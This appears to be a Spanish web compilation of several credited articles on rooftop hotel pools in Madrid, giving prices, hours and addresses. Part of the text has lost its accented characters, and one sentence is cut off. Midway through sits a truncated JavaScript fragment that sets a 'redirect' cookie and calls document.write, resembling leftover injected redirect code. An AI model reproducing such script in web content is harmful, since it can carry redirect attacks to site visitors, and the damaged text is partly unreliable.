Noticias

Las mejores piscinas en azoteas de Madrid

La piscina de azotea ms grande de Madrid en la que se baaba Ava Gardner

La gran Ava Gardner no solo se puso las botas con el que era el plato m

La piscina de azotea ms grande de Madrid en la que se baaba Ava Gardner

La gran Ava Gardner no solo se puso las botas con el que era el plato ms tpico del hotel, el cocido, sino que tambin disfrut de los croissants que salan cada maana del horno de su pastelera propia, de los ccteles que le preparaban en exclusiva en el bar y sobre todo de la piscina de la azotea, ubicada en la ltima planta, la dcima.

Porque a ver dnde iba a encontrar unas vistas de Madrid como las del Emperador, el histrico hotel de la Gran Va construido en 1947 que tantos das (y noches) de gloria le dio a la protagonista de Mogambo. Ya Ernest Hemingway, Gary Cooper o Sofia Loren, otros de los personajes que han desfilado por aqu.

Esa misma panormica en 360 estar disponible de nuevo desde maana, cuando reabra su beach club, ubicado en la terraza de 1.000 metros cuadrados. La piscina sigue estando ah, con rcord castizo incluido: es la ms grande de una azotea levantada en todo Madrid gracias a sus 14 metros de largo por seis de ancho ms los 2,80 metros de profundidad. El acceso es gratuito para los huspedes, mientras que todo el que quiera disfrutarla podr hacerlo de lunes a domingo de 10.00 a 21.00 horas por 50 euros (entre semana) y 63 (los fines de semana), con copa de champn incluida.

La azotea, cuyo diseo ha corrido a cargo del interiorista Nacho Garca de Vinuesa, cuenta con solarium, chill out, camas balinesas, 120 tumbonas y un snack bar con un men a base de hamburguesas, ensaladas, pokes, pizzas o sndwiches, adems de taquillas y vestuario. La configuracin del espacio, eso s, ha cambiado respecto a otros aos para cumplir con las normas anti-covid.

Hay que sumar la segunda joya de la corona despus de la piscina, el Sky Bar, con una oferta de ms 300 destilados y ccteles de autor. «A partir de las ocho se abrir al pblico general para disfrutar de sesiones de dj y otras sorpresas», apunta Pilar Lancha, directora comercial del hotel. «Terrazas hay muchas en Madrid, pero ninguna con un beach club en un ambiente tan exclusivo y cool y con una piscina as para baarse. Si hasta tena trampoln cuando se construy!», aade.

De eso hace ya 74 aos. Firmaron el proyecto los arquitectos Julin y Joaqun Otamendi, autor este ltimo tambin del edificio de Correos en la Plaza de Cibeles, actual sede del Ayuntamiento. Ya entonces concibieron una obra revolucionaria. De ah que la piscina parezca flotar sobre Madrid.

Por algo es uno de los hoteles favoritos de Alaska y Mario Vaquerizo, quienes incluso se casaron en la azotea. El cantante Ariel Rot y The Cabriolets lo eligieron tambin para grabar el vdeoclip de Cuando vengas a Madrid, versin del clsico chotis que protagoniz una campaa de turismo de la capital.

Conforme a los criterios de

Las 5 mejores azoteas con piscina en Madrid

Pasar el día en una azotea con piscina en Madrid se puede catalogar como un plan luxury debido al precio que puede llegar a costar ya que los servicios que ofrecen las instalaciones son inmejorables.

Las 5 mejores azoteas con piscina en Madrid

Llega el verano y seguramente en alguna ocasión no hay ningún plan de vacaciones para ir a la playa o desplazarse a un lugar cercano para refrescarse, pero eso ya no es un problema para aquellas personas que viven en la capital madrileña, y es que además de las piscinas municipales, se pueden dar un chapuzón en las alturas, en los mejores hoteles de Madrid. Lo mejor de todo es que en la mayoría no es necesario hospedarse, tan solo hay algunas excepciones en las que se tiene que pasar al menos una noche en el hotel para poder disfrutar de la piscina, cosa que en algunos casos sale más rentable debido a los precios.

Es una experiencia única, ya que no solo se podrá tomar el sol y estar fresquito lejos del asfalto, sino que las vistas serán impresionantes. Es un plan perfecto para sorprender a aquella persona especial o simplemente para romper con la monotonía de los largos días de verano en los que la pereza hace que no se hagan muchos planes, bueno más bien el calor.

La única contra de este plan es que su precio se aleja por completo de lo ‘low cost’, llegando a alcanzar precios desorbitados en algunos de los hoteles. Puede llegar a costar entre 30 a 60 euros pasar un día en sus instalaciones, aunque siempre hay ofertas , y alguno que se ajusta más a un precio más razonable. A continuación una lista con las cinco mejores azoteas con piscina de Madrid :

Este maravilloso hotel situado en el céntrico barrio de Salamanca a tan solo dos pasos de la zona comercial de Serrano, ofrece el servicio de piscina que se localiza en su enorme azotea por tan solo 15 euros al día, no es un precio como si se fuera a una piscina municipal pero es algo asequible dentro de los precios que tiene el hacer este plan de lujo. Las instalaciones de la piscina están abiertas de 11 de la mañana a 20 horas. Un lugar de relax y desconexión donde poder aprovechar los rayos de sol y poder refrescarse en el centro de la capital. Además, el restaurante tiene una gran variedad de comida para poder tomar algo mientras se disfruta de las vistas.

En la ruta de las mejores azoteas con piscina de Madrid, también se encuentra el Hotel Oscar Room Mate, situado en la Plaza de Vázquez de Mella número 12. La azotea tiene una panorámica impresionante donde ver el atardecer se puede convertir en tu plan favorito. Ver como se quita el sol y poco a poco y los tejados de Madrid pierden esa tonalidad cálida es una maravilla, digno de ver. No obstante, visitar la piscina del hotel siempre es más barata entre semana que los fines de semana (doblando casi su precio). Lo mejor de todo, que también puedes disfrutar de un plan alternativo porque en invierno se convierte en piscina climatizada. Y cuidado, no se admiten menores de 14 años.

Este maravilloso lugar ha sustituido a los antiguos cines Luna, y ha sido transformado en un ‘lounge resort’ donde poder cenar, tomar algo incluso darte un chapuzón. Además, consta también de un gimnasio, y lugar para eventos, vaya lo tiene todo recogido en un mismo lugar. La entrada al establecimiento es gratuita, los costes se aplicarán en función de las actividades que quieras realizar, done en recepción amablemente informarán de horarios y tarifas, ya que pueden variar. Si quieres contemplar las calles de Malasaña, la azotea de Gyamge es el lugar idóneo.

El hotel Urban G.L, de lujo es catalogado con cinco estrellas se ubica en pleno centro madrileño, a unos pasos del Congreso de los Diputados. De estilo Art Decó, el hotel posee una arquitectura vanguardista que integra 96 habitaciones y suites de diseño. Lo que más llama la atención es su impresionante piscina exterior situada en la azotea, de acceso gratuito, pero hay una pega es exclusivo para clientes. Por lo tanto, si se quiere disfrutar de su magnífica terraza hay que pasar al menos una noche en el hotel para poder disfrutar de todas las instalaciones.

En Gran Vía se sitúa el Hotel Indigo, la ubicación es perfecta para poder disfrutar de sus vistas desde la azotea que cuenta con piscina al aire libre con solárium. Es un refugio perfecto para escapar del calor, eso sí todo tiene un precio, y poder refrescarse en la terraza de este icónico hotel cuesta 50 euros (pueden varias los precios en función de las ofertas, por eso siempre es mejor visitar su página web), aunque por la noche el acceso es libre a la terraza , donde sirven cockteles y picoteo. Cuando llegan los fines de semana, organizan la sesión Sky Zoo, con DJ’s en un escenario de lujo para así ambientar una perfecta noche de verano inolvidable.

Artículos recomendados

Bekia

Top 5 mejores piscinas en Madrid, ¡toma nota!

Las mejores piscinas de Madrid, en las azoteas más cool. Buen ambiente, vistas en altura y cocktails perfectos para relajarse. ¿Te las vas a perder?

Top 5 mejores piscinas en Madrid, ¡toma nota!

Ya llega el verano, y uno de los momentos más esperados es el de ir a la piscina y tomar el sol. En este post te presentamos las mejores piscinas de Madrid, ¡querrás visitarlas todas!

Y es que sobra decir que nuestros hábitos de piscineo han cambiado. Las piscinas masificadas a pie de calle y rodeadas de césped dan paso a las azoteas de los hoteles más top de Madrid, que presentan piscinas y terrazas de lo más glamurosas y con vistas a la gran ciudad. En serio, ¿existe un plan mejor para disfrutar una tarde perfecta en Madrid?

Hay que decir que estas piscinas no están pensadas tanto para hacer ejercicio, como para relajarse y descansar. Y es que en Madrid las altas temperaturas, que en ocasiones rozan los 40 ºC, hacen necesario estar en remojo.  Asimismo, el agua tiene muchísimos beneficios para nuestra salud: bajo el agua se reduce al máximo la tensión de nuestras articulaciones y huesos, además, nadar nos relaja y refresca en los días de calor…

Muchos de nuestros apartamentos se encuentran cerca de la zona en la que se localizan todas estas terrazas, en el centro de la capital. ¡Y ahora, sin más dilación, te presentamos el top 5 de las mejores piscinas de Madrid en hoteles de lujo!

Mejores piscinas de madrid, blog gavirental

1- Hotel Emperador

Situado en el pleno corazón de Madrid, es un hotel de cuatro estrellas increíble. Desde su fachada (merece la pena fijarse si paseas por Gran Vía) hasta el último rincón de su azotea donde se encuentra su impresionante piscina. Hay que recordar que el Emperador fue el escenario de la boda de Alaska y Mario. ¡Menudo sitio ficharon! 

Fuente: Instagram Hotel Emperador

La piscina permanece abierta de mayo a septiembre. Para acceder a ella, has de ascender hasta el décimo piso de este hotel, desde el que se puede ver el skyline de la ciudad. Mientras disfrutas de las vistas puedes pedir algo de comer y beber, puesto que cuentan con una barra para tomar cócteles, combinados, cervezas, refrescos y bocados gourmet. ¡Simplemente genial!

Fuente foto: Instagram Hotel Emperador

2-Hotel Urban

Se trata de un hotel de 5 estrellas que se encuentra también en el centro de la capital, exactamente en Carrera de San Jerónimo, 34, al lado de Sol y justo enfrente del Congreso de los Diputados. Con una estética imponente, este hotel y su azotea, se convierten en un espacio cosmopolita de lujo, perfecto para darse una pausa.

Fuente: www.hotelurban.com

En su exclusiva terraza, diseñada en tonos blancos y negros, y combinados con elementos de madera, y antigüedades, se puede acceder a la piscina, perfecta para un pequeño chapuzón. Además, podrás degustar una selección de ricas tapas y refrescarte con un cocktail en la mano. ¡Sin duda un plan perfecto para disfrutar del paisaje nocturno madrileño!

Fuente: www.hotelurban.com

3-Hotel Room Mate Óscar

Situado en plena Plaza de Vázquez de Mella está el Hotel Room Mate Óscar, con una de las terrazas más emblemáticas de Madrid, y específicamente, de Chueca. Con una vista 360º, los visitantes pueden elegir las vistas que desean tener de la capital mientras disfrutan de la paz de la azotea, y de la increíble piscina.

Fuente: www.guiadelocio.com

La azotea del Hotel Room Mate Óscar presenta una decoración con lounge, camas balinesas, tumbonas chaise longue y una amplia barra, perfectas para disfrutar y relajarte. Uno de los puntos fuertes de este hotel es su carta de bebidas, que cuenta con una selección de 30 cocktails distintos, que se van renovando cada año.

Fuente: www.madridsensations.com

4-Hotel Indigo. Terraza Gato Canalla

Otra de las infinity pool más imponentes del paisaje madrileño se encuentra en la azotea del Hotel Indigo. La terraza tiene nombre propio: el Gato Canalla. Y aunque dicen que de noche todos los gatos son pardos, es también cuando más gusto da sentarse en una azotea y disfrutar de un ambiente inmejorable, con música, cocktails, batidos, refrescos y gin tonics. 

Fuente: www.elgatocanalla.com

Además de una amplia carta de bebidas, también puedes pedir algo de comer mientras te relajas viendo la puesta de sol. La terraza del Gato Canalla cuenta con 7 menús para todos los gustos y a precios muy competitivos. ¿Te atreves a probarlos?

Fuente: Instagram Hotel Indigo

5- Hotel Santo Domingo

La última, pero no menos importante, piscina top de nuestro ranking es la que se encuentra en el hotel Santo Domingo, en la calle San Bernando, número 1. En la azotea de este hotel se encuentra una de las piscinas más cool de Madrid, ¡y esta es de agua salada! Una opción realmente buena para relajarte y disfrutar de nuestra bella ciudad. 

Fuente: www.hotelsantodomingo.es

Además, tienes una carta con bebidas y pinxtos diseñados por el cocinero Arzak. Con toda esta información, ¿te hace una escapada a la azotea del Hotel Santo Domingo?

Fuente: www.madridcoolblog.com

No obstante, si lo tuyo es tomar algo en una azotea, pero te sobra el elemento piscina, ¡no pasa nada! ¡Te proponemos unas terrazas increíbles que te van a enamorar!

Y como dicen los madrileños, ¡de Madrid al cielo!

=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}// ]]>]]>

Las mejores terrazas con piscina de Madrid en las que puedes bañarte para combatir la ola de calor de este verano 2019 con estilo

Cuando llega la ola de calor a Madrid la zona urbana sufre con esa horrible sensación de asfalto derretido. Por eso hemos recopilado las mejores piscinas de…

Las mejores terrazas con piscina de Madrid en las que puedes bañarte para combatir la ola de calor de este verano 2019 con estilo

Stop al envejecimiento cutáneo: esta es la rutina que reafirma, redensifica y revitaliza tu piel

Compartir Las mejores terrazas con piscina de Madrid en las que puedes bañarte para combatir la ola de calor de este verano con estilo

Suscríbete a Trendencias

Recibe un email al día con nuestros artículos:

Suscribir

No todos tenemos la suerte de tener una piscina en casa (sobre todo los amantes de la vida en el centro). Y aunque refrescarse en una terracita me parece un placer grandioso, con temperaturas que llegarán a los 41 grados esta semana, no hay nada que iguale al lujo que es poder darse un chapuzón. Recopilamos las piscinas en los rooftops madrileños con más estilo. 

Las de los hoteles urbanos son la opción más fácil, pero hay que tener en cuenta que no todas permiten el acceso al público general.  Estas sí. Con tumbonas, carta de cócteles y vista al skyline, son localizaciones ideales para cuando quieras escapar de la ola de calor. Eso sí, su precio no es de lo más económico pero, de vez en cuando no está mal darse un capricho. Di adiós a morirte de envidia cotilleando los feeds ajenos en Instagram y disfruta. ¡A refrescarse!

Si te gusta la comida mexicana, vas a gozarlo con el brunch veraniego del Hotel Indigo Madrid Gran Vía. Se llama Acqua Mex y se celebra en su terraza los domingos. Una fiesta mexicana que combina piscina, comida mexicana (nachos, una quesadilla, dos tequeños, dos tacos, tres minifajitas y un postre), una selección de cócteles y refrescos y música. ¿Para qué queremos más?

¿Lo mejor? Disfrutar de uno de los mejores atardeceres de Madrid mientras te tomas una Margarita o un Mojito.

¿Dónde? En Calle de Silva, 6, 28013 Madrid hasta este 15 de septiembre. 

Precio: 45 euros.

En plena calle Gran Vía se encuentra el hotel con la piscina que tantas veces habrás visto en Instagram. La terraza en la que se ubica, Roof Garden, tiene 800 m2 y es una de las más grandes de Madrid. Tiene restaurante y bar y su piscina permite hacer buenos largos nadando. 

¿Lo mejor? La arquitectura del hotel le da un toque singular y único, solo hace falta ver la estatua que preside la piscina.

¿Dónde?Calle Gran Vía, 53, 28013 Madrid

Precio: desde 38 euros por persona y día.

El hotel de la cadena Leonardo Hoteles tiene una de nuestras terrazas favoritas para el verano y su piscina es una gozada. Inspirada en la diosa de la noche de la mitología griega es toda una muestra de urban art con azulejos pintados a mano de inspiración portuguesa. 

¿Lo mejor? Es perfecta para desconectar gracias a sus camas balinesas que son muy intimas.

¿Dónde? Calle del Aviador Zorita, 34, 28020 Madrid

Precio: 30 euros con derecho a una hamaca, toalla y una consumición. La entrada VIP cuesta 60 euros e incluye cama balinesa, toallas, cesta de frutas y botella de cava.

La azotea del Bless Hotel no tiene una piscina muy grande pero su alberca está muy bien para remojar los pies. Su decoración está muy cuidada y sus camas son muy cómodas para tomar el sol. Cuenta con una carta de cócteles, refrescos y tapas y está abierta hasta la una y media de la mañana por lo que puedes alargar la jornada y ver atardecer con vistas panorámicas.

¿Lo mejor? Sus tapas Berasategui style.

¿Dónde? Calle Velázquez, 62, Madrid

Precio: Entrada libre y cócteles a 15 euros, cócteles sin alcohol a 11 euros y platos entre 15 euros y 30 euros.

El Hotel Oscar Roommate tiene unas vistas asombrosas y su piscina, ubicada en el centro de su terraza, es una opción a tener en cuenta para refrescarse con vistas a Madrid.

¿Lo mejor? Es de las más animadas y puedes ir de afterwork con los compañeros del curro aunque solo te mojes los pies.

¿Dónde? Plaza Pedro Zerolo, 12, 28004 Madrid.

Precio: Desde 25 euros dependiendo de si es media jornada o entera, entre semana o fin de semana. 

La terraza del gimnasio Gymage esconde no una, sino dos piscinas que aunque no son las más grandes de la capital no están nada mal. Estilo lounge, tiene tumbonas y asientos blancos. También bar y restaurante con algo de picoteo.

¿Lo mejor? Las vistas, ofrece una panorámica inigualable.

¿Dónde? Calle de la Luna, 2, 28004 Madrid

Precio: 12 euros de lunes a jueves (10 a partir de las 15h) y 15 euros de viernes a domingo.

En la séptima planta del hotel se esconde una piscina con un diseño minimalista que nos ha sorprendido. La azotea ha sido decorada por la interiorista Lázara Rosa-Violán y se nota. Sus vistas a la calles O’Donnell y Alcalá son impresionantes. Tiene una zona de restauración y otra de relax con hamacas para tomar el sol.

¿Lo mejor? Es una piscina plunge pool acristalada.

¿Dónde? Calle de Alcalá, 66, 28009 Madrid

Aunque su piscina es pequeñita, el espacio de azotea de este hotel está muy bien para olvidarse del calor madrileño un ratito. Tiene tumbonas, piscina climatizada, unas vistas 360º de los edificios emblemáticos de Madrid y una carta de combinados que no está mal.

¿Lo mejor? La iluminación por la noche es espectacular. Y como es relativamente nueva no la conoce mucha gente (de momento). 

¿Dónde? Calle de Atocha, 49, 28012 Madrid

Precio: El precio es de 20 euros por persona e incluye una consumición.

Con vistas a la Torre Picasso, al área financiera de Azca y a la Sierra de Guadarrama, esta piscina se encuentra en la última planta del hotel. Su tamaño está muy bien para refrescarse y tiene bastantes tumbonas. Destaca por ser espaciosa, con un diseño clásico y elegante. Además, cuenta con un bar.

¿Lo mejor? Está muy bien ubicada.

¿Dónde? Plaza de Carlos Trias Bertrán, 4, 28020 Madrid

Precio: 15 euros.

El hotel perteneciente a Preferred Hotels&Resorts es uno de los preferidos de las celebrities y es famoso por su privacidad. Su piscina, aunque no está en una azotea, cuenta con spa y hamacas para tomar el sol, además de una carta de aperitivos y platos ligeros.

¿Lo mejor? Al estar situada en un patio interior es muy tranquila y perfecta para teletrabajar.

¿Dónde? Calle de Velázquez, 8, 28001 Madrid

Precio: Si no eres cliente del hotel, para entrar tienes que ser socio del Max Wellness Club Wellington.

Si te ha conquistado la idea de ir a pasar la tarde a una de estas piscinas, puedes completar tu plan con alguna de las actividades gratuitas que ofrecen esta semana, hasta el domingo, las Gatoterrazas. Conciertos clandestinos, clases de cocina y coctelería, talleres de joyería, de fotografía y de moda, acción poética y animaciones a cargo de actores. Entre las terrazas que participan en esta bienvenida al verano se encuentra la de Ginkgo Sky Bar que tiene una de las piscinas más chulas de la capital (lastima que no esté abierta al público). 

Puedes consultar el programa de actividades en su web. El taller de joyería artesana en cerámica del 29 de junio en Lateral de Castellana es nuestra favorita.

Fotos  | @floragonzalezlopez, Ginkgo Sky Bar, NYX Madrid, Picos Pardos Sky Lounge, Hotel Oscar RoomMate, Gymage Lounge Resort, H10 Puerta de Alcalá, Hotel Indigo, Hotel Axel, Hotel Holiday Inn Madrid Bernabeu, Hotel Wellington, Hotel Emperador

Trendencias en Instagram

Seguir

Compartir Las mejores terrazas con piscina de Madrid en las que puedes bañarte para combatir la ola de calor de este verano con estilo

Compartir

Partners

Las mejores terrazas con piscina de Madrid y el mejor verano

Las mejores terrazas con piscina de Madrid están casi siempre en un hotel. Un completo listado de precios y horarios de las mejores en Madrid

Las mejores terrazas con piscina de Madrid y el mejor verano

Que sepáis que la playa en estas fechas no tiene tanto glamour… Tan llenas, tan ruidosas, tan… llenas… Así que me pregunto: ¿es posible tostarse al sol y bañarse en una de esas piscinas espectaculares de Madrid, de esas de las azoteas de los hoteles? Aquí os dejo una lista de las mejores terrazas con piscina en Madrid, con sus horarios y precios, para que valoréis por vosotros mismos.

Hotel Emperador

The Balcony

¿Dónde está vuestro sitio favorito para refrescaros con estos calores?

Si no llevo los ojos muy abiertos, me pierdo por Madrid. Y tanto si me fijo en el camino como si me pierdo, encuentro sitios preciosos para compartirlos con vosotros. Tengo una manía compulsiva: disfrutar de la buena comida. ¿Quieres descubrir Madrid con nosotros?

referencia:
www.elmundo.es
www.bekiaviajes.com
www.gavirental.com
www.trendencias.com
megustamibarrio.es

Publicaciones relacionadas

Botón volver arriba